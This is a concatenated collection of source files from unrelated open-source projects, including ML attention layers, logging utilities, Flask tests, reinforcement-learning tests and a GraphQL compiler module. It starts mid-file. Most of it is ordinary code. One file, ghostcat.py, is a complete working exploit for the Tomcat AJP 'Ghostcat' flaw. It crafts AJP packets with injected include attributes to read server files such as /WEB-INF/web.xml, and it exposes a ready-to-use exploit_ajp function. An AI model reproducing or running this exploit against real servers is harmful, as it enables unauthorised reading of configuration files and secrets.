self.freeze_temperature + _FROZEN_SAMPLING_RANGE_MIN,
self.freeze_temperature + _FROZEN_SAMPLING_RANGE_MAX,
)
return self.obj.states[Temperature].set_value(temperature)
else:
# We'll set the temperature just one degree above freezing. Hopefully the object
# isn't in a fridge.
return self.obj.states[Temperature].set_value(self.freeze_temperature + 1.0)
def _get_value(self):
return self.obj.states[Temperature].get_value() <= self.freeze_temperature
# Nothing needs to be done to save/load Frozen since it will happen due to temperature caching.
def _dump(self):
return None
def load(self, data):
return
def _update(self):
self.update_texture()
|
lra/attention_reformer.py | batuozt/transformer-ls | 177 | 11179495 | """
This file is from https://github.com/mlpen/Nystromformer
"""
import torch
import torch.nn as nn
from transformers.models.reformer.modeling_reformer import LSHSelfAttention, ReformerConfig
class LSHAttention(LSHSelfAttention):
def __init__(self, config, query, key, value):
self.num_hash = config.num_hash
reformer_config = ReformerConfig()
reformer_config.attention_head_size = config.head_dim
reformer_config.num_attention_heads = config.num_head
reformer_config.attn_layers = ["lsh"]
reformer_config.num_hashes = config.num_hash
reformer_config.is_decoder = False
reformer_config.max_position_embeddings = config.max_seq_len
reformer_config.hidden_size = config.transformer_dim
super().__init__(reformer_config)
self.query_key.weight = query.weight
self.value.weight = value.weight
def forward(self, X, mask):
return super().forward(hidden_states = X, attention_mask = mask).hidden_states
def extra_repr(self):
return f'num_hash={self.num_hash}'
|
components/iscesys/StdOEL/StdOELPy.py | vincentschut/isce2 | 1,133 | 11179496 | <reponame>vincentschut/isce2
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Copyright 2010 California Institute of Technology. ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# United States Government Sponsorship acknowledged. This software is subject to
# U.S. export control laws and regulations and has been classified as 'EAR99 NLR'
# (No [Export] License Required except when exporting to an embargoed country,
# end user, or in support of a prohibited end use). By downloading this software,
# the user agrees to comply with all applicable U.S. export laws and regulations.
# The user has the responsibility to obtain export licenses, or other export
# authority as may be required before exporting this software to any 'EAR99'
# embargoed foreign country or citizen of those countries.
#
# Author: <NAME>
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
from __future__ import print_function
import os
from contextlib import contextmanager
import sys
from . import StdOEL as ST
## A convinence constructor to make the writer the way applications need it
def create_writer(where, fileTag, flag, filename=None,
out=None, err=None, log=None):
"""create_writer(*args, **kwargs) takes the args/kwargs needed to
make a ready-for Application StdOEL instance.
"""
result = StdOEL()
result.createWriters(out=out, err=err, log=log)
result.configWriter(where, fileTag, flag, filename=filename)
result.init()
return result
@contextmanager
def context_writer(where, fileTag, flag, filename=None,
out=None, err=None, log=None):
"""create_writer as a context manager, see that for signature.
Usage:
>>>with context_writer as <writer>:
>>>... <suite>
>>>"""
result = create_writer(where, fileTag, flag, filename=filename,
out=out, err=err, log=log)
yield result
result.finalize()
## Any class that talks to StdOEL, needs these methods.
class _WriterInterface(object):
_stdWriter = None
def __init__(self):
self._create_writer("log" ,"", True, "insar.log")
return None
def getStdWriter(self):
return self._stdWriter
def setStdWriter(self,var):
self._stdWriter = var
stdWriter = property(getStdWriter, setStdWriter)
def _create_writer(self, where, fileTag, flag, filename=None,
out=None, err=None, log=None):
self._stdWriter = create_writer(where, fileTag, flag,
filename=filename,
out=out, err=err, log=log)
return None
def _writer_set_file_tags(self, *args):
return self.stdWriter.set_file_tags(*args)
## What does this mean?
def setState(self, obj):
obj.setStdWriter_Py(int(self.stdWriter))
pass
## The StdOEL object
class StdOEL(object):
_writer = None
_factory = None
_out = 'screen'
_err = 'screen'
_log = 'file'
_logFilename = 'log.log'
_outFilename = 'log.out'
_errFilename = 'log.err'
def finalize(self):
ST.finalize(self._writer, self._factory)
return None
def init(self):
ST.init(self._writer)
return None
def createWriters(self, out=None, err=None, log=None):
#if std type is not defined use the defaults
if out is None:
out = self._out
else:
self._out = out
if err is None:
err = self._err
else:
self._err = err
if log is None:
log = self._log
else:
self._log = log
self._writer, self._factory = ST.createWriters(out, err, log)
return None
def getWriter(self):
return self._writer
def setWriter(self, *args, **kwargs):
raise NotImplementedError("Use createWriters and configWriters")
writer = property(getWriter, setWriter)
## A variable that is an int should be callable by int().
def __int__(self):
return self.writer
def configWriter(self, where, fileTag, flag, filename=None):
if where == 'out':
if filename is None:
filename = self._outFilename
else:
self._outFilename = filename
if where == 'err':
if filename is None:
filename = self._errFilename
else:
self._logFilename = filename
if where == 'log':
if filename is None:
filename = self._logFilename
else:
self._logFilename = filename
self.setFilename(filename, where)
self.setFileTag(fileTag, where)
self.setTimeStampFlag(flag, where)
return None
def setFilename(self,name,where):
ST.setFilename(self._writer, name, where)
return None
def setFileTag(self, name, where):
ST.setFileTag(self._writer, name, where)
return None
## a convinience method
def set_file_tags(self, name, *args):
for where in args:
self.setFileTag(name, where)
return self
def setTimeStampFlag(self, flag, where):
#cannot pass bool to C, so convert to int
ST.setTimeStampFlag(self._writer,
int(bool(flag)),
where)
return None
|
test_classful/test_method_dashified.py | antgel/flask-classful | 201 | 11179530 | from flask import Flask
from flask_classful import FlaskView
from nose.tools import eq_
class DashifiedDefaultView(FlaskView):
def some_route(self):
return "some route"
class DashifiedAttributeView(FlaskView):
method_dashified = True
def another_route(self):
return "another route"
class DashifiedAttributeOverrideView(FlaskView):
method_dashified = True
def yet_another_route(self):
return "yet another route"
app = Flask('test-app')
DashifiedDefaultView.register(app, method_dashified=True)
DashifiedAttributeView.register(app)
DashifiedAttributeOverrideView.register(app, method_dashified=False)
client = app.test_client()
def test_original_method_dashifield():
eq_(False, DashifiedDefaultView.method_dashified)
eq_(True, DashifiedAttributeView.method_dashified)
eq_(True, DashifiedAttributeOverrideView.method_dashified)
def test_some_route():
resp = client.get('/dashified-default/some-route/')
eq_(b"some route", resp.data)
def test_another_route():
resp = client.get('/dashified-attribute/another-route/')
eq_(b"another route", resp.data)
def test_yet_another_route():
resp = client.get('/dashified-attribute-override/yet_another_route/')
eq_(b"yet another route", resp.data)
|
tools/test/topos/uk-onos.py | meodaiduoi/onos | 1,091 | 11179552 | <gh_stars>1000+
#!/usr/bin/python
from onosnet import run
from uk import UkTopo
run( UkTopo() )
|
src/dependency_injector/resources.py | whysage/python-dependency-injector | 1,997 | 11179610 | """Resources module."""
import abc
from typing import TypeVar, Generic, Optional
T = TypeVar('T')
class Resource(Generic[T], metaclass=abc.ABCMeta):
@abc.abstractmethod
def init(self, *args, **kwargs) -> Optional[T]:
...
def shutdown(self, resource: Optional[T]) -> None:
...
class AsyncResource(Generic[T], metaclass=abc.ABCMeta):
@abc.abstractmethod
async def init(self, *args, **kwargs) -> Optional[T]:
...
async def shutdown(self, resource: Optional[T]) -> None:
...
|
running_modes/transfer_learning/link_invent_actions/collect_stats.py | lilleswing/Reinvent-1 | 183 | 11179626 | <reponame>lilleswing/Reinvent-1
import random
from reinvent_chemistry import TransformationTokens
from reinvent_chemistry.library_design import BondMaker, AttachmentPoints
from reinvent_chemistry.conversions import Conversions
from typing import List, Optional
import numpy as np
import scipy.stats as sps
from reinvent_models.model_factory.generative_model_base import GenerativeModelBase
from reinvent_models.link_invent.dto import SampledSequencesDTO
from running_modes.transfer_learning.dto.collected_stats_dto import CollectedStatsDTO
from running_modes.transfer_learning.dto.sampled_stats_dto import SampledStatsDTO
from running_modes.transfer_learning.link_invent_actions.base_action import BaseAction
from running_modes.transfer_learning.logging.base_transfer_learning_logger import BaseTransferLearningLogger
class CollectStats(BaseAction):
def __init__(self, model: GenerativeModelBase, training_data: List[List[str]],
validation_data: Optional[List[List[str]]], logger: BaseTransferLearningLogger, sample_size,
initialize_data_loader_func):
BaseAction.__init__(self, logger=logger)
self._model = model
self._training_data = training_data
self._validation_data = validation_data
self._sample_size = sample_size
self._get_data_loader = initialize_data_loader_func
self._bond_maker = BondMaker()
self._attachment_points = AttachmentPoints()
self._conversions = Conversions()
self._tokens = TransformationTokens()
def run(self) -> CollectedStatsDTO:
self._logger.log_message("Collecting stats")
# collect training stats
training_data_loader = self._get_data_loader(self._get_subset(self._training_data), batch_size=128,
shuffle=False)
training_nll_list, training_sampled_stats = self._calc_stats(training_data_loader)
if self._validation_data is not None:
validation_data_loader = self._get_data_loader(self._get_subset(self._validation_data), batch_size=128,
shuffle=False)
validation_nll_list, validation_sampled_stats = self._calc_stats(validation_data_loader)
dist = [training_sampled_stats.nll_input_sampled_target, validation_sampled_stats.nll_input_sampled_target,
training_nll_list, validation_nll_list]
else:
validation_nll_list = None
validation_sampled_stats = None
dist = [training_sampled_stats.nll_input_sampled_target, training_nll_list]
stats = CollectedStatsDTO(jsd_binned=self._jsd(dist, binned=True), jsd_un_binned=self._jsd(dist, binned=False),
nll=training_nll_list, training_stats=training_sampled_stats,
validation_nll=validation_nll_list, validation_stats=validation_sampled_stats)
return stats
def _get_subset(self, data: List):
subset = list(random.sample(data, self._sample_size))
return subset
def _calc_stats(self, data_loader):
sampled_sequence_list = []
nll_list = []
for warhead_batch, linker_batch in data_loader:
sampled_sequence_list += self._model.sample(*warhead_batch)
nll_list += list(self._model.likelihood(*warhead_batch, *linker_batch).data.cpu().numpy())
sample_stats = self._get_sampled_stats(sampled_sequence_list)
return nll_list, sample_stats
def _jsd(self, dists, binned=False):
min_size = min(len(dist) for dist in dists)
dists = [dist[:min_size] for dist in dists]
if binned:
dists = [self._bin_dist(dist) for dist in dists]
num_dists = len(dists)
avg_dist = np.sum(dists, axis=0) / num_dists
return sum((sps.entropy(dist, avg_dist) for dist in dists)) / num_dists
@staticmethod
def _bin_dist(dist, bins=1000, dist_range=(0, 100)):
bins = np.histogram(dist, bins=bins, range=dist_range, density=False)[0]
bins[bins == 0] = 1
return bins / bins.sum()
def _get_sampled_stats(self, sampled_sequence_list: List[SampledSequencesDTO]) -> SampledStatsDTO:
nll_list = []
molecule_smiles_list = []
molecule_parts_smiles_list = []
for sample in sampled_sequence_list:
nll_list.append(sample.nll)
labeled_linker = self._attachment_points.add_attachment_point_numbers(sample.output, canonicalize=False)
molecule = self._bond_maker.join_scaffolds_and_decorations(labeled_linker, sample.input)
molecule_smiles = self._conversions.mol_to_smiles(molecule) if molecule else None
molecule_is_valid = True if molecule_smiles else False
molecule_parts_smiles = sample.input + self._tokens.ATTACHMENT_SEPARATOR_TOKEN + sample.output
if molecule_is_valid:
molecule_smiles_list.append(molecule_smiles)
molecule_parts_smiles_list.append(molecule_parts_smiles)
sample_stats = SampledStatsDTO(nll_input_sampled_target=nll_list,
molecule_smiles=molecule_smiles_list,
molecule_parts_smiles=molecule_parts_smiles_list,
valid_fraction=len(molecule_smiles_list) / len(nll_list) * 100)
return sample_stats
|
tests/test_compat.py | PavanTatikonda/toasted-marshmallow | 304 | 11179671 | from toastedmarshmallow.compat import is_overridden
class Base(object):
def foo(self):
pass
class NoOverride(Base):
pass
class HasOverride(Base):
def foo(self):
pass
def test_is_overridden():
assert is_overridden(HasOverride().foo, Base.foo)
assert not is_overridden(NoOverride().foo, Base.foo)
|
graph4nlp/pytorch/modules/prediction/classification/graph_classification/max_pooling.py | cminusQAQ/graph4nlp | 1,269 | 11179685 | import torch
import torch.nn as nn
from .....data.data import from_batch
from ..base import PoolingBase
class MaxPooling(PoolingBase):
r"""Apply max pooling over the nodes in the graph.
.. math::
r^{(i)} = \max_{k=1}^{N_i}\left( x^{(i)}_k \right)
"""
def __init__(self, dim=None, use_linear_proj=False):
super(MaxPooling, self).__init__()
if use_linear_proj:
assert dim is not None, "dim should be specified when use_linear_proj is set to True"
self.linear = nn.Linear(dim, dim, bias=False)
else:
self.linear = None
def forward(self, graph, feat):
r"""Compute max pooling.
Parameters
----------
graph : GraphData
The graph data.
feat : str
The feature field name.
Returns
-------
torch.Tensor
The output feature.
"""
graph_list = from_batch(graph)
output_feat = []
for g in graph_list:
feat_tensor = g.node_features[feat]
if self.linear is not None:
feat_tensor = self.linear(feat_tensor)
output_feat.append(torch.max(feat_tensor, dim=0)[0])
output_feat = torch.stack(output_feat, 0)
return output_feat
|
notebooks/ch6/detect.py | wangyonghong/RabbitMQ-in-Depth | 111 | 11179695 | """
Facial recognition specific methods
"""
import cv2
def _boxes(filename, faces):
img = cv2.imread(filename)
for (x, y, w, h) in faces:
cv2.rectangle(img, (x, y), (x + w, y + h), (100, 100, 255), 2)
filename = filename.split('/')[-1]
parts = filename.split('.')
new_name = '/tmp/%s-detected.%s' % (parts[0], parts[1])
cv2.imwrite(new_name, img)
return new_name
def faces(filename, ratio=1.2, neighbors=4, min_size=(10, 10)):
img = cv2.imread(filename, 0)
hc = cv2.CascadeClassifier('ch6/haarcascade_frontalface_alt.xml')
return _boxes(filename, hc.detectMultiScale(img, ratio, neighbors,
cv2.cv.CV_HAAR_SCALE_IMAGE,
min_size))
|
thirdparty/ghostcat.py | wukong-bin/PeiQi-LandGrey-ClassHound | 489 | 11179706 | <reponame>wukong-bin/PeiQi-LandGrey-ClassHound
#!/usr/bin/env python
# coding: utf-8
# Referer: https://github.com/00theway/Ghostcat-CNVD-2020-10487/blob/master/ajpShooter.py
import codecs
import socket
import platform
try:
from urlparse import urlparse
except ImportError:
from urllib.request import urlparse
class AjpRequest(object):
def __init__(self, request_url, method='GET', headers=[], attributes=[]):
self.request_url = request_url
self.method = method
self.headers = headers
self.attributes = attributes
def method2code(self, method):
methods = {
'OPTIONS': 1,
'GET': 2,
'HEAD': 3,
'POST': 4,
'PUT': 5,
'DELETE': 6,
'TRACE': 7,
'PROPFIND': 8
}
code = methods.get(method, 2)
return code
def make_headers(self):
header2code = {
b'accept': b'\xA0\x01', # SC_REQ_ACCEPT
b'accept-charset': b'\xA0\x02', # SC_REQ_ACCEPT_CHARSET
b'accept-encoding': b'\xA0\x03', # SC_REQ_ACCEPT_ENCODING
b'accept-language': b'\xA0\x04', # SC_REQ_ACCEPT_LANGUAGE
b'authorization': b'\xA0\x05', # SC_REQ_AUTHORIZATION
b'connection': b'\xA0\x06', # SC_REQ_CONNECTION
b'content-type': b'\xA0\x07', # SC_REQ_CONTENT_TYPE
b'content-length': b'\xA0\x08', # SC_REQ_CONTENT_LENGTH
b'cookie': b'\xA0\x09', # SC_REQ_COOKIE
b'cookie2': b'\xA0\x0A', # SC_REQ_COOKIE2
b'host': b'\xA0\x0B', # SC_REQ_HOST
b'pragma': b'\xA0\x0C', # SC_REQ_PRAGMA
b'referer': b'\xA0\x0D', # SC_REQ_REFERER
b'user-agent': b'\xA0\x0E' # SC_REQ_USER_AGENT
}
headers_ajp = []
for (header_name, header_value) in self.headers:
code = header2code.get(header_name, b'')
if code != b'':
headers_ajp.append(code)
headers_ajp.append(self.ajp_string(header_value))
else:
headers_ajp.append(self.ajp_string(header_name))
headers_ajp.append(self.ajp_string(header_value))
return self.int2byte(len(self.headers), 2), b''.join(headers_ajp)
def make_attributes(self):
"""
org.apache.catalina.jsp_file
javax.servlet.include.servlet_path + javax.servlet.include.path_info
"""
attribute2code = {
b'remote_user': b'\x03',
b'auth_type': b'\x04',
b'query_string': b'\x05',
b'jvm_route': b'\x06',
b'ssl_cert': b'\x07',
b'ssl_cipher': b'\x08',
b'ssl_session': b'\x09',
b'req_attribute': b'\x0A', # Name (the name of the attribut follows)
b'ssl_key_size': b'\x0B'
}
attributes_ajp = []
for (name, value) in self.attributes:
code = attribute2code.get(name, b'')
if code != b'':
attributes_ajp.append(code)
if code == b'\x0A':
for v in value:
attributes_ajp.append(self.ajp_string(v))
else:
attributes_ajp.append(self.ajp_string(value))
return b''.join(attributes_ajp)
def ajp_string(self, message_bytes):
# an AJP string
# the length of the string on two bytes + string + plus two null bytes
message_len_int = len(message_bytes)
return self.int2byte(message_len_int, 2) + message_bytes + b'\x00'
def int2byte(self, data, byte_len=1):
if int(platform.python_version()[0]) == 3:
return data.to_bytes(byte_len, 'big')
else:
return ('%%0%dx' % (byte_len << 1) % data).decode('hex')[-byte_len:]
def make_forward_request_package(self):
"""
AJP13_FORWARD_REQUEST :=
prefix_code (byte) 0x02 = JK_AJP13_FORWARD_REQUEST
method (byte)
protocol (string)
req_uri (string)
remote_addr (string)
remote_host (string)
server_name (string)
server_port (integer)
is_ssl (boolean)
num_headers (integer)
request_headers *(req_header_name req_header_value)
attributes *(attribut_name attribute_value)
request_terminator (byte) OxFF
"""
req_ob = urlparse(self.request_url)
# JK_AJP13_FORWARD_REQUEST
prefix_code_int = 2
prefix_code_bytes = self.int2byte(prefix_code_int)
method_bytes = self.int2byte(self.method2code(self.method))
protocol_bytes = b'HTTP/1.1'
req_uri_bytes = req_ob.path.encode('utf8')
remote_addr_bytes = b'127.0.0.1'
remote_host_bytes = b'localhost'
server_name_bytes = req_ob.hostname.encode('utf8')
# SSL flag
if req_ob.scheme == 'https':
is_ssl_boolean = 1
else:
is_ssl_boolean = 0
# port
server_port_int = req_ob.port
if not server_port_int:
server_port_int = (is_ssl_boolean ^ 1) * 80 + (is_ssl_boolean ^ 0) * 443
server_port_bytes = self.int2byte(server_port_int, 2) # convert to a two bytes
is_ssl_bytes = self.int2byte(is_ssl_boolean) # convert to a one byte
self.headers.append((b'host', b'%s:%d' % (server_name_bytes, server_port_int)))
num_headers_bytes, headers_ajp_bytes = self.make_headers()
attributes_ajp_bytes = self.make_attributes()
message = []
message.append(prefix_code_bytes)
message.append(method_bytes)
message.append(self.ajp_string(protocol_bytes))
message.append(self.ajp_string(req_uri_bytes))
message.append(self.ajp_string(remote_addr_bytes))
message.append(self.ajp_string(remote_host_bytes))
message.append(self.ajp_string(server_name_bytes))
message.append(server_port_bytes)
message.append(is_ssl_bytes)
message.append(num_headers_bytes)
message.append(headers_ajp_bytes)
message.append(attributes_ajp_bytes)
message.append(b'\xff')
message_bytes = b''.join(message)
send_bytes = b'\x12\x34' + self.ajp_string(message_bytes)
return send_bytes
class AjpResponse(object):
def __init__(self, s, result, requesturl):
self.sock = s
self.result = result
self.requesturl = requesturl
self.body_start = False
self.common_response_headers = {
b'\x01': b'Content-Type',
b'\x02': b'Content-Language',
b'\x03': b'Content-Length',
b'\x04': b'Date',
b'\x05': b'Last-Modified',
b'\x06': b'Location',
b'\x07': b'Set-Cookie',
b'\x08': b'Set-Cookie2',
b'\x09': b'Servlet-Engine',
b'\x0a': b'Status',
b'\x0b': b'WWW-Authenticate',
}
def parse_response(self):
# first two bytes are the 'magic'
magic = self.recv(2)
# next two bytes are the length
data_len_int = self.read_int(2)
code_int = self.read_int(1)
if code_int == 3:
self.parse_send_body_chunk()
elif code_int == 4:
self.parse_headers()
elif code_int == 5:
self.parse_response_end()
return
self.parse_response()
def parse_headers(self):
status_int = self.read_int(2)
msg_bytes = self.read_string()
headers_number_int = self.read_int(2)
for i in range(headers_number_int):
# header name: two cases
first_byte = self.recv(1)
second_byte = self.recv(1)
if first_byte == b'\xa0':
header_key_bytes = self.common_response_headers[second_byte]
else:
header_len_bytes = first_byte + second_byte
header_len_int = int(codecs.encode(header_len_bytes, 'hex'), 16)
# header_len_int = int.from_bytes(header_len_bytes, byteorder='big')
header_key_bytes = self.read_bytes(header_len_int)
# consume the 0x00 terminator
self.recv(1)
header_value_bytes = self.read_string()
def parse_send_body_chunk(self):
if not self.body_start:
self.body_start = True
chunk = self.read_string()
self.result.append(chunk)
def parse_response_end(self):
self.sock.close()
def read_int(self, int_len):
return int(codecs.encode(self.recv(int_len), 'hex'), 16)
def read_bytes(self, bytes_len):
return self.recv(bytes_len)
def read_string(self, int_len=2):
data_len = self.read_int(int_len)
data = self.recv(data_len)
# consume the 0x00 terminator
end = self.recv(1)
return data
def recv(self, data_len):
data = self.sock.recv(data_len)
while len(data) < data_len:
data += self.sock.recv(data_len - len(data))
return data
class AjpShooter(object):
def __init__(self, args):
self.args = args
self.url = args.get('url')
self.method = args.get('method')
self.headers = args.get('headers')
self.ajp_port = args.get('ajp_port')
self.target_file = args.get('target_file')
self.shooter = 'read'
def shoot(self):
headers = self.transform_headers()
target_file = self.target_file.encode('utf8')
attributes = []
evil_req_attributes = [
(b'javax.servlet.include.request_uri', b'index'),
(b'javax.servlet.include.servlet_path', target_file)
]
for req_attr in evil_req_attributes:
attributes.append((b"req_attribute", req_attr))
if self.shooter == 'read':
self.url += '/index.txt'
else:
self.url += '/index.jsp'
ajp_ip = urlparse(self.url).hostname
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)
s.connect((ajp_ip, self.ajp_port))
message = AjpRequest(self.url, self.method, headers, attributes).make_forward_request_package()
s.send(message)
result = []
AjpResponse(s, result, self.url).parse_response()
return b"".join(result)
def transform_headers(self):
new_headers = []
if self.headers:
for k, v in self.headers.items():
new_headers.append((k.lower().encode('utf8'), v.lower().encode('utf8')))
return new_headers
def exploit_ajp(url, ajp_port, target_file, method='GET', headers={}):
_ = {
'url': url,
'headers': headers,
'method': method,
'ajp_port': ajp_port,
'target_file': target_file if target_file.startswith("/") else "/" + target_file
}
try:
ret = AjpShooter(_).shoot()
return ret
except socket.timeout as e:
exit("[-] Connection ajp port [{}] error! socket timeout".format(ajp_port))
except socket.error as e:
print(exit("[-] Connection ajp port [{}] error! {}".format(ajp_port, e)))
except Exception as e:
import traceback
traceback.print_exc()
return None
if __name__ == "__main__":
print(exploit_ajp('http://127.0.0.1:8080', 8009, '/WEB-INF/web.xml'))
|
coderedcms/urls.py | fakegit/coderedcms | 526 | 11179725 | from django.urls import include, path, re_path
from wagtail.contrib.sitemaps.views import sitemap
from wagtail.core import urls as wagtailcore_urls
from coderedcms.settings import cr_settings
from coderedcms.views import (
event_generate_ical_for_calendar,
event_generate_recurring_ical_for_event,
event_generate_single_ical_for_event,
event_get_calendar_events,
favicon,
robots,
serve_protected_file
)
urlpatterns = [
# CodeRed custom URLs
re_path(r'^favicon\.ico$', favicon, name='codered_favicon'),
re_path(r'^robots\.txt$', robots, name='codered_robots'),
re_path(r'^sitemap\.xml$', sitemap, name='codered_sitemap'),
re_path(r'^{0}(?P<path>.*)$'.format(
cr_settings['PROTECTED_MEDIA_URL'].lstrip('/')),
serve_protected_file,
name="serve_protected_file"
),
# Event/Calendar URLs
path('ical/generate/single/', event_generate_single_ical_for_event,
name='event_generate_single_ical'),
path('ical/generate/recurring/', event_generate_recurring_ical_for_event,
name='event_generate_recurring_ical'),
path('ical/generate/calendar/', event_generate_ical_for_calendar,
name='event_generate_ical_for_calendar'),
path('ajax/calendar/events/', event_get_calendar_events, name='event_get_calendar_events'),
# Wagtail
re_path(r'', include(wagtailcore_urls)),
]
|
alf/algorithms/sarsa_algorithm_test.py | www2171668/alf | 175 | 11179749 | <reponame>www2171668/alf
# Copyright (c) 2019 Horizon Robotics. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for sarsa_algorithm.py."""
from absl import logging
from absl.testing import parameterized
import functools
import torch
import alf
from alf.algorithms.actor_critic_algorithm import ActorCriticAlgorithm
from alf.algorithms.config import TrainerConfig
from alf.algorithms.ppo_algorithm_test import unroll
from alf.algorithms.sarsa_algorithm import SarsaAlgorithm
from alf.environments.suite_unittest import ActionType, PolicyUnittestEnv
from alf.networks import (ActorDistributionNetwork,
ActorDistributionRNNNetwork, ActorNetwork,
ActorRNNNetwork, StableNormalProjectionNetwork,
CriticNetwork, CriticRNNNetwork)
from alf.utils import common
from alf.utils.math_ops import clipped_exp
DEBUGGING = True
def _create_algorithm(env, sac, use_rnn, on_policy, priority_replay):
observation_spec = env.observation_spec()
action_spec = env.action_spec()
fc_layer_params = (16, 16)
continuous_projection_net_ctor = functools.partial(
alf.networks.NormalProjectionNetwork,
state_dependent_std=True,
scale_distribution=True,
std_transform=clipped_exp)
if use_rnn:
if sac:
actor_net = functools.partial(
ActorDistributionRNNNetwork,
fc_layer_params=fc_layer_params,
lstm_hidden_size=(4, ),
continuous_projection_net_ctor=continuous_projection_net_ctor)
else:
actor_net = functools.partial(
ActorRNNNetwork,
fc_layer_params=fc_layer_params,
lstm_hidden_size=(4, ))
critic_net = functools.partial(
CriticRNNNetwork,
joint_fc_layer_params=fc_layer_params,
lstm_hidden_size=(4, ))
else:
if sac:
actor_net = functools.partial(
ActorDistributionNetwork,
fc_layer_params=fc_layer_params,
continuous_projection_net_ctor=continuous_projection_net_ctor)
else:
actor_net = functools.partial(
ActorNetwork, fc_layer_params=fc_layer_params)
critic_net = functools.partial(
CriticNetwork, joint_fc_layer_params=fc_layer_params)
config = TrainerConfig(
root_dir="dummy",
unroll_length=2,
initial_collect_steps=12 * 128 * 5,
use_rollout_state=True,
mini_batch_length=1,
mini_batch_size=256,
num_updates_per_train_iter=1,
whole_replay_buffer_training=False,
clear_replay_buffer=False,
priority_replay=priority_replay,
debug_summaries=DEBUGGING,
summarize_grads_and_vars=DEBUGGING,
summarize_action_distributions=DEBUGGING)
return SarsaAlgorithm(
observation_spec=observation_spec,
action_spec=action_spec,
env=env,
config=config,
epsilon_greedy=0.1,
calculate_priority=priority_replay,
on_policy=on_policy,
ou_stddev=0.2,
ou_damping=0.5,
actor_network_ctor=actor_net,
critic_network_ctor=critic_net,
actor_optimizer=alf.optimizers.AdamTF(lr=5e-3),
critic_optimizer=alf.optimizers.AdamTF(lr=2e-2),
alpha_optimizer=alf.optimizers.AdamTF(lr=2e-2),
debug_summaries=DEBUGGING)
class SarsaTest(parameterized.TestCase, alf.test.TestCase):
# TODO: on_policy=True is very unstable, try to figure out the possible
# reason.
@parameterized.parameters(
dict(on_policy=False, sac=False), dict(on_policy=False, use_rnn=False),
dict(on_policy=False, use_rnn=True), dict(priority_replay=True))
def test_sarsa(self,
on_policy=False,
sac=True,
use_rnn=False,
priority_replay=False):
logging.info(
"sac=%d on_policy=%s use_rnn=%s" % (sac, on_policy, use_rnn))
env_class = PolicyUnittestEnv
iterations = 500
num_env = 128
if on_policy:
num_env = 128
steps_per_episode = 12
env = env_class(
num_env, steps_per_episode, action_type=ActionType.Continuous)
eval_env = env_class(
100, steps_per_episode, action_type=ActionType.Continuous)
algorithm = _create_algorithm(
env,
on_policy=on_policy,
sac=sac,
use_rnn=use_rnn,
priority_replay=priority_replay)
env.reset()
eval_env.reset()
for i in range(iterations):
algorithm.train_iter()
eval_env.reset()
eval_time_step = unroll(eval_env, algorithm, steps_per_episode - 1)
logging.log_every_n_seconds(
logging.INFO,
"%d reward=%f" % (i, float(eval_time_step.reward.mean())),
n_seconds=1)
self.assertAlmostEqual(
1.0, float(eval_time_step.reward.mean()), delta=0.3)
if __name__ == '__main__':
alf.test.main()
|
Simulator/gazebo_simulator/models/race_track/real_world/gate/meshes/set_gate_properties.py | 473867143/Prometheus | 1,217 | 11179766 | import argparse
import xml.etree.ElementTree as ET
def set_property(xml_root, name, value):
# changing the field {emission, ambient}
for elem in xml_root.iter():
if name in elem.tag:
color = elem.getchildren()[0]
if color is None:
raise IOError("Not found name {}".format(name))
assert value >= 0, "invalid {} light".format(name)
assert value <= 1, "invalid {} light".format(name)
color.text ='{0} {0} {0} 1'.format(value)
return xml_root
def main(args):
tree = ET.parse(args.xml_file)
ET.register_namespace('', "http://www.collada.org/2005/11/COLLADASchema")
xml_root = tree.getroot()
if args.ambient:
set_property(xml_root, "ambient", args.ambient)
if args.emission:
set_property(xml_root, "emission", args.emission)
tree.write(args.xml_file, encoding="utf-8", xml_declaration=True)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Select gate illumination properties.')
parser.add_argument('-ambient', type=float, required=False)
parser.add_argument('-xml_file', type=str, default='gate.dae')
parser.add_argument('-emission', type=float, required=False)
args = parser.parse_args()
main(args)
|
graphql_compiler/compiler/helpers.py | kensho-technologies/graphql-compiler | 521 | 11179771 | <gh_stars>100-1000
# Copyright 2017-present Kensho Technologies, LLC.
"""Common helper objects, base classes and methods."""
from abc import ABCMeta, abstractmethod
from collections import namedtuple
from functools import total_ordering
import string
from typing import Any, Collection, Dict, Hashable, Iterable, Optional, Tuple, TypeVar, Union, cast
import funcy
from graphql import GraphQLNonNull, GraphQLString, is_type
from graphql.language.ast import ArgumentNode
from graphql.type.definition import (
GraphQLInterfaceType,
GraphQLList,
GraphQLObjectType,
GraphQLOutputType,
GraphQLUnionType,
)
import six
from ..exceptions import GraphQLCompilationError
from ..global_utils import VertexPath
from ..schema import (
INBOUND_EDGE_FIELD_PREFIX,
OUTBOUND_EDGE_FIELD_PREFIX,
TYPENAME_META_FIELD_NAME,
is_vertex_field_name,
)
# These are the Java (OrientDB) representations of the ISO-8601 standard date and datetime formats.
STANDARD_DATE_FORMAT = "yyyy-MM-dd"
STANDARD_DATETIME_FORMAT = "yyyy-MM-dd'T'HH:mm:ss"
VARIABLE_ALLOWED_CHARS = frozenset(six.text_type(string.ascii_letters + string.digits + "_"))
OUTBOUND_EDGE_DIRECTION = "out"
INBOUND_EDGE_DIRECTION = "in"
ALLOWED_EDGE_DIRECTIONS = frozenset({OUTBOUND_EDGE_DIRECTION, INBOUND_EDGE_DIRECTION})
FilterOperationInfo = namedtuple(
